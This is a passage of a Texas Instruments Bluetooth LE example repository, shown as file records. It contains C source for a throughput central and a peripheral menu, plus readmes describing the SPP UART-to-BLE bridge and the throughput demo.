(throughputProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n throughputHandles[i].charHdl = temp->charHdl;\n memcpy(throughputHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we can index throughputHandles like throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput Service Found, Starting Throughput\");\n\n // Inform Application to Toggle Throughput\n Event_post(syncEvent, 
SBC_TOGGLE_THROUGHPUT_EVT);\n }\n discState = BLE_DISC_STATE_IDLE;\n }\n}\n\n/*\n * Local Function to quickly check the device list\n * For a particular Address\n */\nbool checkDevList(uint8_t* addr, uint8_t* index)\n{\n int i = 0;\n\n for(i = 0; i < scanRes; i++)\n {\n if(memcmp(devList[i].addr, addr, B_ADDR_LEN) == 0)\n {\n *index = i;\n return true;\n }\n }\n\n return false;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_addDeviceInfo\n *\n * @brief Add a device to the device discovery result list\n * Info added is: BDAddr and Scan Response Data\n * It's assumed all data passed in will get freed\n *\n * @return none\n */\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data)\n{\n // If result count not at max\n if (scanRes < DEFAULT_MAX_SCAN_RES)\n {\n // Check our device list to ensure we haven't seen this device before\n uint8_t index = 0;\n\n if(checkDevList(pAddr, &index) == false)\n {\n // Create new entry for Device, it's not in our list\n devList[scanRes].addrType = addrType;\n memcpy(devList[scanRes].addr, pAddr, B_ADDR_LEN);\n\n // Assign the index\n index = scanRes;\n\n // Increment scan result count\n scanRes++;\n }\n\n // Create a copy of the data provided\n // Grab Memory from ICall HEAP\n uint8_t* temp = (uint8_t*)ICall_malloc(dataLen);\n // Copy the Data\n memcpy(temp, data, dataLen);\n\n // Check which type of data we have and assign it (@ref GAP_Adv_Report_Types)\n switch(dataType)\n {\n case GAP_ADRPT_ADV_IND:\n case GAP_ADRPT_ADV_NONCONN_IND:\n case GAP_ADRPT_ADV_DIRECT_IND:\n case GAP_ADRPT_ADV_SCAN_IND:\n\n // Any Type of Advertisement Data\n devList[index].advertLen = dataLen;\n devList[index].advertData = temp;\n\n break;\n\n case GAP_ADRPT_SCAN_RSP:\n\n // Scan Response Data\n devList[index].scanLen = dataLen;\n devList[index].scanRsp = temp;\n\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_eventCB\n *\n * @brief Central event callback function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return TRUE if safe to deallocate event message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent)\n{\n // Forward the role event to the application\n if (SimpleBLECentral_enqueueMsg(SBC_STATE_CHANGE_EVT,\n SUCCESS, (uint8_t *)pEvent))\n {\n // App will process and free the event\n return FALSE;\n }\n\n // Caller should free the event\n return TRUE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscHandler\n *\n * @brief Clock handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_startDiscHandler(UArg a0)\n{\n Event_post(syncEvent, SBC_START_DISCOVERY_EVT);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys)\n{\n SimpleBLECentral_enqueueMsg(SBC_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_readRssiHandler\n *\n * @brief Read RSSI handler function\n *\n * @param a0 - read RSSI index\n *\n * @return none\n */\nvoid SimpleBLECentral_readRssiHandler(UArg a0)\n{\n SimpleBLECentral_enqueueMsg(SBC_RSSI_READ_EVT, SUCCESS,\n (uint8_t 
*)&readRssi[a0]);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData - message data pointer.\n *\n * @return TRUE or FALSE\n */\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t state,\n void *pData)\n{\n sbcEvt_t *pMsg = ICall_malloc(sizeof(sbcEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_speedHandler\n *\n * @brief RTOS clock handler that counts number of bytes received\n *\n * @param a0 - RTOS clock arg0.\n *\n * @return void\n */\nvoid SimpleBLECentral_speedHandler(UArg a0)\n{\n // Place Bytes Received into Circular Buffer\n bytesRecvd_cb[bytesRecvd_cb_index] = bytesRecvd;\n\n // Update Instantaneous Throughput\n SimpleBLECentral_enqueueMsg(SBC_MEASURE_INST_SPEED_EVT, SUCCESS, (void*)&bytesRecvd_cb[bytesRecvd_cb_index]);\n\n // Update Average Throughput\n Event_post(syncEvent, SBC_MEASURE_AVG_SPEED_EVT);\n\n // Calculate next Index + Update Rolling Average\n bytesRecvd_cb_index++;\n bytesRecvd = 0; // Reset the count\n if ( bytesRecvd_cb_index >= CB_SIZE )\n {\n // Wrap the index back to the head\n bytesRecvd_cb_index = 0;\n\n // Indicate that the buffer is now filled\n cbBufferFilled = true;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_PHYHandler\n *\n * @brief RTOS clock handler for Coded PHY changes\n *\n * @param a0 - RTOS clock arg0.\n *\n * @return void\n */\nvoid SimpleBLECentral_PHYHandler(UArg a0)\n{\n // Check if we've changed to 1M before changing to the requested PHY\n if(phyIndex == 0 && phyConfirm)\n {\n // Because we are in a SWI, the UART Driver should not be used\n // Inform the Application task to send request\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phyClock_phyIndex);\n }\n else\n {\n // We're still trying to get to a coded PHY\n // Restart the timer\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doSetDLEPDU\n *\n * @brief Set PDU preference.\n *\n * @param index - 0, 1\n *\n * @return always true\n */\nbool SimpleBLECentral_doSetDLEPDU(uint8 index)\n{\n // Vars to keep track of active packet length settings\n uint16_t* txOctets = ICall_malloc(sizeof(uint16_t));\n uint16_t txTime = 0;\n\n switch (index)\n {\n case 0:\n *txOctets = DEFAULT_PDU_SIZE;\n txTime = 328;\n break;\n case 1:\n *txOctets = DLE_MAX_PDU_SIZE;\n txTime = 17040;\n break;\n }\n\n // ONLY RX PDU of Peripheral can be modified from central\n // In other words, using the commands below which adjust this device's TX PDU,\n // the peer device will adjust its RX PDU size to allow reception.\n\n if( throughputHandles )\n {\n // Here we'll utilize the throughput profile to have the peer device\n // change its TX PDU size in order to send more data and increase throughput\n // or decrease TX PDU size to reduce throughput\n\n // Inform the Application to perform a GATT write with\n // the selected size\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, (void*) 
txOctets);\n }\n else\n {\n // DLE HCI command to adjust PDU size for current connection\n HCI_LE_SetDataLenCmd(connHandle, *txOctets, txTime);\n\n // write suggested default for future connections\n HCI_LE_WriteSuggestedDefaultDataLenCmd(*txOctets, txTime);\n\n ICall_free(txOctets);\n }\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doSetPhy\n *\n * @brief Set PHY preference.\n *\n * @param index - 0, 1, 2, 3\n *\n * @return always true\n */\nbool SimpleBLECentral_doSetPhy(uint8 index)\n{\n static uint8_t phy[] = {\n HCI_PHY_1_MBPS, HCI_PHY_2_MBPS, HCI_PHY_CODED, HCI_PHY_CODED\n };\n\n // Switch to determine PHY options (needed for coded S2 and S8 mode)\n switch(index)\n {\n case 0:\n case 1:\n phyOptions = HCI_PHY_OPT_NONE;\n break;\n case 2:\n phyOptions = HCI_PHY_OPT_S2;\n break;\n case 3:\n phyOptions = HCI_PHY_OPT_S8;\n break;\n }\n\n // Generate index to send over to peripheral\n uint8_t* data = ICall_malloc(sizeof(uint8_t));\n switch(phy[index])\n {\n case HCI_PHY_1_MBPS:\n *data = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n *data = 1;\n break;\n\n case HCI_PHY_CODED:\n {\n if(phyOptions == HCI_PHY_OPT_S2)\n *data = 2;\n else if (phyOptions == HCI_PHY_OPT_S8)\n *data = 3;\n }\n break;\n }\n\n if( throughputHandles )\n {\n\n // Check if we're already using coded PHY - switch over to 1M\n // in between in order to keep stability\n if(phyIndex != *data && *data >= 2 && phyIndex >= 2)\n {\n uint8_t* phy1M = ICall_malloc(sizeof(uint8_t));\n *phy1M = 0;\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phy1M);\n\n // Start A Timer to trigger a Coded PHY change\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n\n // Assign the requested PHY to the payload of the PHY handler\n phyClock_phyIndex = data;\n }\n else\n {\n // Inform the Application to perform a GATT write with\n // the selected size - this will tell the peripheral to change PHY\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, data);\n }\n\n }\n else\n {\n // Set this device's PHY Preference on the current connection.\n HCI_LE_SetPhyCmd(connHandle, LL_PHY_USE_PHY_PARAM, phy[index], phy[index], phyOptions);\n\n // Set this device's PHY Preference on future connections by using:\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_PHY_PARAM, phy[index], phy[index]);\n\n ICall_free(data);\n }\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doScanAndConnect\n *\n * @brief Scan for devices or connect to the selected device.\n *\n * @param index - 0, 1, 2\n *\n * @return always true\n */\nbool SimpleBLECentral_doScanAndConnect(uint8 index)\n{\n switch (index)\n {\n case 0:\n // SELECT NEXT DEVICE ON SCAN LIST\n SBC_NextDevice();\n\n break;\n\n case 1:\n // CONNECT TO SELECTED DEVICE\n SBC_ConnectToDevice();\n\n break;\n\n case 2:\n // SCAN FOR DEVICES\n\n // Disable Scanning until completed\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_NONE, TBM_ITEM_ALL);\n\n // Indicate to the user that Scanning Has Started\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Scanning...\");\n\n // Clear the Device List\n SBC_ClearDeviceList();\n\n // Command to tell GAPRole to start scanning\n GAPCentralRole_StartDiscovery(DEFAULT_DISCOVERY_MODE,\n DEFAULT_DISCOVERY_ACTIVE_SCAN,\n DEFAULT_DISCOVERY_WHITE_LIST);\n break;\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn 
SimpleBLECentral_doToggleRSSI\n *\n * @brief Toggle RSSI Readings\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doToggleRSSI(uint8 index)\n{\n // Ignored\n (void)index;\n\n if (SimpleBLECentral_RssiFind(connHandle) == NULL)\n {\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Starting\");\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n SimpleBLECentral_CancelRssi(connHandle);\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Canceled\");\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doDisconnect\n *\n * @brief Disconnect from current Connection\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doDisconnect(uint8 index)\n{\n // Ignored\n (void)index;\n\n GAPCentralRole_TerminateLink(connHandle);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SBC_ClearDeviceList\n *\n * @brief Clear the Device List and Display.\n *\n * @return void\n */\nvoid SBC_ClearDeviceList(){\n\n int i = 0;\n\n //Go through Device List and Clear out the ICALL Heap Allocs\n for(i = 0; i < scanRes; i++){\n if(devList[i].advertData != NULL)\n {\n ICall_free(devList[i].advertData);\n devList[i].advertData = NULL;\n devList[i].advertLen = 0;\n\n }\n\n if(devList[i].scanRsp != NULL)\n {\n ICall_free(devList[i].scanRsp);\n devList[i].scanRsp = NULL;\n devList[i].scanLen = 0;\n }\n }\n\n // Clear the Device Display\n Display_clearLine(dispHandle, SBC_ROW_STATUS_2);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_3);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_4);\n\n // Reset Scan Res indicating No Valid Scan data on Device List\n scanRes = 0;\n scanIdx = -1;\n}\n\n/*********************************************************************\n * @fn SBC_NextDevice\n *\n * @brief Select the next device on the Device List and Display.\n *\n * @return void\n */\nvoid SBC_NextDevice(){\n // Increment scanIndex to the next valid entry\n ((scanIdx + 1) == scanRes) ? scanIdx = 0 : scanIdx++;\n\n // Print the Device pointed to by the Index\n Display_print1(dispHandle, SBC_ROW_STATUS_2, 0, \"Scanned Device %d\", (scanIdx+1));\n Display_print0(dispHandle, SBC_ROW_STATUS_3, 0, Util_convertBdAddr2Str(devList[scanIdx].addr));\n\n // Is next device a throughput Peripheral?\n if(memcmp(searchStr, devList[scanIdx].scanRsp, sizeof(searchStr)) == 0)\n {\n Display_print0(dispHandle, SBC_ROW_STATUS_4, 0, \"-- Throughput Profile Supported --\");\n }\n else\n {\n Display_clearLine(dispHandle, SBC_ROW_STATUS_4);\n }\n}\n\n/*********************************************************************\n * @fn SBC_ConnectToDevice\n *\n * @brief Connect to the selected Device\n *\n * @return void\n */\nvoid SBC_ConnectToDevice()\n{\n // connect to current device selected by scanIdx\n uint8_t *peerAddr = devList[scanIdx].addr;\n uint8_t addrType = devList[scanIdx].addrType;\n\n // GAP Role to Connecting\n state = BLE_STATE_CONNECTING;\n\n GAPCentralRole_EstablishLink(DEFAULT_LINK_HIGH_DUTY_CYCLE,\n DEFAULT_LINK_WHITE_LIST,\n addrType, peerAddr);\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
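The speed handler in the central source above samples `bytesRecvd` into a circular buffer, then derives an instantaneous value and a rolling average from it. Below is a minimal standalone sketch of that bookkeeping, assuming a fixed window size; the names `cb_push` and `cb_average` are illustrative and not symbols from the example.

```c
#include <stdbool.h>
#include <stdint.h>

#define CB_SIZE 10 /* assumed window size; the example defines its own */

static uint32_t cb[CB_SIZE];    /* bytes received per sample period */
static uint8_t  cbIndex = 0;    /* next slot to write */
static bool     cbFilled = false;

/* Record the byte count for one sample period (what the clock handler does). */
static void cb_push(uint32_t bytesThisPeriod)
{
    cb[cbIndex++] = bytesThisPeriod;
    if (cbIndex >= CB_SIZE)
    {
        cbIndex = 0;     /* wrap the index back to the head */
        cbFilled = true; /* from now on all CB_SIZE slots are valid */
    }
}

/* Rolling average over however many valid samples exist so far. */
static uint32_t cb_average(void)
{
    uint8_t  count = cbFilled ? CB_SIZE : cbIndex;
    uint32_t sum = 0;

    for (uint8_t i = 0; i < count; i++)
    {
        sum += cb[i];
    }

    return (count > 0) ? (sum / count) : 0;
}
```

The newest sample doubles as the instantaneous throughput, which is why the handler above enqueues a pointer to the slot it just wrote before advancing the index.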
{
"alpha_fraction": 0.6898550987243652,
"alphanum_fraction": 0.7057970762252808,
"avg_line_length": 35.28947448730469,
"blob_id": "006f49c200c58b102d888a850bb72631ca6e1b36",
"content_id": "ae3d9835a989f2684f061309fed2ece5be893db4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 38,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/src/app/throughput_peripheral_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"throughput_peripheral_menu.h\"\n#include \"throughput_peripheral.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 2 submenus, 1 action, no upper */\nMENU_OBJ(sbpMenuMain, NULL, 3, NULL)\n MENU_ITEM_SUBMENU(&sbpMenuSetPhy)\n MENU_ITEM_SUBMENU(&sbpMenuSetDLEPDU)\n MENU_ITEM_ACTION(\"Toggle Throughput Demo\", SimpleBLEPeripheral_doThroughputDemo)\n MENU_ITEM_ACTION(\"Disconnect from Peer\", SimpleBLEPeripheral_doThroughputDemo)\nMENU_OBJ_END\n\n/* Menu: Set PHY\n 5 actions, upper = sbpMenuMain */\nMENU_OBJ(sbpMenuSetPhy, \"Set PHY\", 4, &sbpMenuMain)\n MENU_ITEM_ACTION(\"1 Mbps\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"2 Mbps\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S2\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S8\", SimpleBLEPeripheral_doSetPhy)\nMENU_OBJ_END\n\n/* Menu: Set DLE PDU\n 2 actions, upper = sbpMenuMain */\nMENU_OBJ(sbpMenuSetDLEPDU, \"Set PDU\", 2, &sbpMenuMain)\n MENU_ITEM_ACTION(\"27 Bytes\", SimpleBLEPeripheral_doSetDLEPDU)\n MENU_ITEM_ACTION(\"251 Bytes\", SimpleBLEPeripheral_doSetDLEPDU)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
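In the menu table above, every `MENU_ITEM_ACTION` in a list shares a single callback, and the two-button menu passes the selected item's position in as the `index` argument; that is how one `SimpleBLEPeripheral_doSetPhy` can distinguish 1 Mbps, 2 Mbps, Coded:S2, and Coded:S8. Here is a hedged sketch of that dispatch pattern; the `Sketch_doSetPhy` name and the constants are illustrative, not SDK symbols.

```c
#include <stdbool.h>
#include <stdint.h>

/* Illustrative stand-ins for the HCI PHY constants a real handler would use. */
#define SKETCH_PHY_1M    0x01
#define SKETCH_PHY_2M    0x02
#define SKETCH_PHY_CODED 0x04

/* One callback serves every MENU_ITEM_ACTION in the list; the menu passes the
 * selected item's position (0 = 1 Mbps, 1 = 2 Mbps, 2 = Coded:S2, 3 = Coded:S8)
 * and the handler dispatches on it. */
bool Sketch_doSetPhy(uint8_t index)
{
    static const uint8_t phy[] =
    {
        SKETCH_PHY_1M, SKETCH_PHY_2M, SKETCH_PHY_CODED, SKETCH_PHY_CODED
    };

    if (index >= sizeof(phy) / sizeof(phy[0]))
    {
        return false; /* not a valid menu position */
    }

    /* A real handler would now issue the PHY update request (for example via
     * HCI_LE_SetPhyCmd in the TI stack); this sketch only resolves the code. */
    uint8_t requested = phy[index];
    (void)requested;

    return true;
}
```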
{
"alpha_fraction": 0.6458106637001038,
"alphanum_fraction": 0.6961371302604675,
"avg_line_length": 44.38271713256836,
"blob_id": "d4e59fe696f4bda552c03a64b62fce73f17cc709",
"content_id": "e942d36c20cae3c307383a3004b9ba5cc4333ce6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3677,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 81,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\nPurpose / Scope\n===============\n\nThis purpose of this example is to demonstrate a UART to BLE bridge using TI's proprietary\nSerial Port Profile (SPP). The project is based on the \n[UART to Bluetooth® Low Energy (BLE) Bridge Reference Design](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD), \nand has been enhanced to include Bluetooth 5.0 features such as LE 2M PHY.\n\nPrerequisites\n=============\n\n#### Hardware Requirements\n\nBefore running the demo, the user will need the following components:\n\n- 2x [CC2650R2 LaunchPad](http://www.ti.com/tool/launchxl-cc2640r2)\n- 2x Micro USB cable\n\n#### Firmware Requirements\n\n- [BLE5-Stack](http://www.ti.com/tool/SIMPLELINK-CC2640R2-SDK)\n\nSerial Port Service (SPS)\n=========================\n\nThe serial port service is made to implement a bi-directional UART connection over the \nBLE protocol. The service uses a 128 bit UUID: F000C0E0-0451-4000-B000-00000000-0000. \nSPS contains three characteristics, they are listed below.\n\n| Characteristic | UUID |\n|:-----------------:|:-----------------------------------------:|\n|Data | F000C0E1-0451-4000-B000-00000000-0000 |\n|Status | F000C0E2-0451-4000-B000-00000000-0000 |\n|Config | F000C0E3-0451-4000-B000-00000000-0000 |\n\nFor more information about the Serial Port Profile (SPP), please see the \n[TI-Design Guide](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD) or the \n[SPS Spec Document](http://www.ti.com/lit/TIDUA63).\n\nRunning the Demo\n================\n\nRunning the demo is as simple and compiling and loading the code, then hooking up to \nyour PC to send a receive data over UART. Please follow the steps below:\n\n1. Compile and load the code\n - Build LaunchPad #1 with the `ble5_spp_ble_client_cc2640r2lp_stack_library` FlashROM_Library project\n - Build and load LaunchPad #1 with the `ble5_spp_ble_client_cc2640r2lp_app` FlashROM_StackLibrary project\n - Build LaunchPad #2 with the `ble5_spp_ble_server_cc2640r2lp_stack_library` FlashROM_Library project\n - Build and load LaunchPad #2 with the `ble5_spp_ble_server_cc2640r2lp_app` FlashROM_StackLibrary project\n\n2. Connect the Boards to the PC terminal\n - You can use the terminal to send data from your PC to the LaunchPad, \n and also display the info sent from one device to another.\n - You will need to open two instances of the terminal program to, \n one to communicate with each board.\n - Follow the steps from our [FAQ](faq.md) to connect to the LaunchPad boards\n - **Please note that the SPP project uses the default baud rate of 115200**\n\n2. Power the boards individually and verify they are initialized\n - The client will blink the green LED twice at initialzation. 
\n It will also display `Auto connecting...` on the terminal\n - The server will blink the red LED once at initialization\n - The client will auto connect to the server using a hardcoded BD\\_ADDR\n - Upon connecting the client will display: \n `Discovering services...Found Serial Port Service...Data Char Found...Notification enabled...`\n - At this point you can type into either terminal window and watch it being echoed \n to the other terminal via BLE.\n\nIn addition to the UART display interface, the project uses the following buttons:\n\nKey | Description\n------------|-----------------------------------------------\nBTN-1 | Send an ASCII character over the air\nBTN-2 | Toggle between 2Mbps and 1Mbps PHY\n\nReferences\n==========\n * [UART To BLE Bridge Wiki](http://processors.wiki.ti.com/index.php/CC2640_UART_to_BLE_Bridge)\n * [UART To BLE Bridge TI Design](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD)\n * [SPS Spec Document](http://www.ti.com/lit/TIDUA63)"
},
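All three SPS characteristics in the readme above extend the TI base UUID F000XXXX-0451-4000-B000-000000000000 with a 16-bit short form. As a sketch of how such a UUID is commonly laid out in a GATT attribute table, least-significant byte first, here is the Data characteristic (short form 0xC0E1); the array name is illustrative and this is an assumption about the layout convention, not a quote from the SPP sources.

```c
#include <stdint.h>

/* 128-bit UUIDs are stored and transmitted least-significant byte first, so
 * F000C0E1-0451-4000-B000-000000000000 is written in reverse. The two bytes
 * at offsets 12 and 13 (0xE1, 0xC0) carry the 16-bit short form that
 * distinguishes Data (0xC0E1), Status (0xC0E2), and Config (0xC0E3). */
static const uint8_t spsDataUUID[16] =
{
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0,
    0x00, 0x40, 0x51, 0x04, 0xE1, 0xC0, 0x00, 0xF0
};
```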
{
"alpha_fraction": 0.7302625775337219,
"alphanum_fraction": 0.7486870288848877,
"avg_line_length": 39.47038269042969,
"blob_id": "24cce1f0cdd13ff152a3eaa506254e67667b1269",
"content_id": "23c5a718c3eb5b1321036ed61f4a9fbfdd2ba232",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11615,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 287,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Throughput Peripheral\n\n## Functional Overview\n\nThis project is meant to be utilized with BLE5-Stack Throughput Central to\ndemonstrate Bluetooth™ 5 features.\n\nThis project is based on the Simple Peripheral sample application from the\nBLE5-Stack component of the SDK. Once in a connection, the user may adjust\nconnection settings.\n\nBLE5-Stack Throughput Central Project should be used in order to do a full\nthroughput demo. However, this project can function standalone to demonstrate\nthe Data Length Extension, 2 Megabit, or Coded PHYs when connected to a peer\ndevice supporting these features.\n\nThis list contains the changes from the standard Simple Peripheral example:\n- Added Support for a custom profile called Throughput Profile\n- Changed MTU Size of project\n- Modified to send Notifications with a message counter\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n- 1 UART Terminal on PC\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_throughput_peripheral_cc2640r2lp_stack`\n - Next build and load `ble5_throughput_peripheral_cc2640r2lp_app`\n\n1. Connect to the LaunchPad via PuTTY (or other serial console emulator). For\n instructions on connecting via PuTTY, please see our [FAQ page](faq.md).\n\n1. After connecting to PuTTY, you will be presented with the Two Button Menu\n system prompting you for actions. However, actions are disabled until a\n connection is formed. Disabled actions are indicated with a 'x'.\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n xSet PHY >\n xSet PDU\n xToggle Throughput Demo\n ```\n\n Current Device Status can also be seen below the menu interface:\n\n ```\n Advertising\n This Device's BDADDR : 0x98072DAA4E5E\n Device GAP Role: Peripheral\n ```\n\n1. Once a connection is formed, the previously disabled options are enabled.\n\n ```\n *Texas Instruments Bluetooth 5 Demo\n < Next Item\n +Set PHY >\n +Set PDU\n Toggle Throughput Demo\n Throughput ON\n 0x00124B005220\n PDU Size: 27B\n\n Num Conns: 1\n This Device's BDADDR : 0x98072DAA4E5E\n Device GAP Role: Peripheral\n ```\n\n Note: If the peer initiating the connection supports the Throughput Profile,\n the Throughput transmission will automatically be turned on.\n\n1. To modify connection settings such as which PHY is being used or the size of\n the DLE PDU, use the left button (BTN1) to select an action, and the right\n button (BTN2) to invoke the action.\n\n# Purpose / Scope\n\nThis example page will demonstrate the maximum BLE throughput that can be\nachieved with a Texas Instruments CC2640R2 where the following assumptions\nare made:\n\n- Both sides of the connection are CC2640 devices. Other stacks in\n master devices such as iOS and Android will limit the maximum\n packets per connection interval, thus limiting the throughput. See\n this [blog post](https://punchthrough.com/blog/posts/maximizing-ble-throughput-on-ios-and-android)\n on how to maximize throughput with Android & iOS devices.\n- Ideal RF conditions. 
Missed events / CRC errors due to RF\n interference will limit the throughput.\n- Both sides of the connection support the Data Length Extension feature\n of the spec.\n- Neither master nor slave device contains processing that will starve\n the controller, thus limiting throughput. That is,\n application-specific processing or other custom constraints may\n further decrease throughput.\n\nThe throughput being measured is actual usable payload GATT throughput.\nAny LL / L2CAP headers are not considered part of the throughput.\nThe GATT architecture used is such that the GATT server is sending GATT\nnotifications to the GATT client.\n\n# Parameters\n\nThe basic idea is to be constantly sending GATT notifications, with as\nlittle overhead as possible, and as little downtime as possible. The\nfollowing parameters must be considered.\n\n### ATT\\_MTU Size\n\nPlease refer to Section \"5.5.2 Maximum Transmission Unit (MTU)\" in the\nCC2640 BLE SW Developer's Guide ([SWRU393](http://www.ti.com/lit/pdf/swru393))\nfor an explanation of the Attribute Protocol Maximum Transmission Unit\n(ATT\\_MTU).\n\nIn order to minimize L2CAP header overhead, the maximum ATT\\_MTU size is being\nused: 251 bytes. This will result in 244 byte notifications being sent. This\nmeans that there is a 7 byte L2CAP overhead for every 244 bytes sent. In order\nto achieve this, both the SBP and SBC projects must set the following defines in\n``bleUserConfig.h``:\n\n```\n #define MAX_NUM_PDU 6\n #define MAX_PDU_SIZE 251\n```\n\nThis will allocate 6 Tx buffers of 251 bytes. A custom application will\nneed to be profiled to verify that there is enough heap for the desired\nPDU / PDU size combination.\n\nIf there is not, then the MAX\\_NUM\\_PDU define can be decreased, possibly\ncausing a loss of throughput. Since the actual (worst case) memory used is a\nproduct of the MAX\\_NUM\\_PDU & MAX\\_PDU\\_SIZE, the system designer will need to\nbalance these parameters according to available memory and capability of the\npeer device. For example, when interfacing to an iOS8+ device, a\nMAX\\_PDU\\_SIZE=162 and MAX\\_NUM\\_PDU=6 would match the iOS device's ATT\\_MTU of\n158 and up to 6 packets per connection event. These parameters may vary from a\ngiven iOS release or device.\n\nNote that the max PDU size is not selected to be 255 (max supported by host).\nThis has to do with the maximum data payload supported by the data length\nextension feature in the controller. Data length extension's role in the\nthroughput study is covered in depth in the next section.\n\n### LE 2M PHY Support\n\nThis demo supports use of the *Bluetooth®* 5 2M PHY. This effectively\ndoubles the number of symbols, and thus bits, sent from the PHY during each\nconnection event.\n\n### LE Controller Data Payload / LE Data Length Extension\n\nThe *Bluetooth* 4.2 specification allows the controller to send data packets\ncontaining up to 251 bytes of application data in a single packet. This is a\ndrastic increase when compared to the previous specifications which limited all\ncontroller data payloads to be 27 bytes. This feature is called data 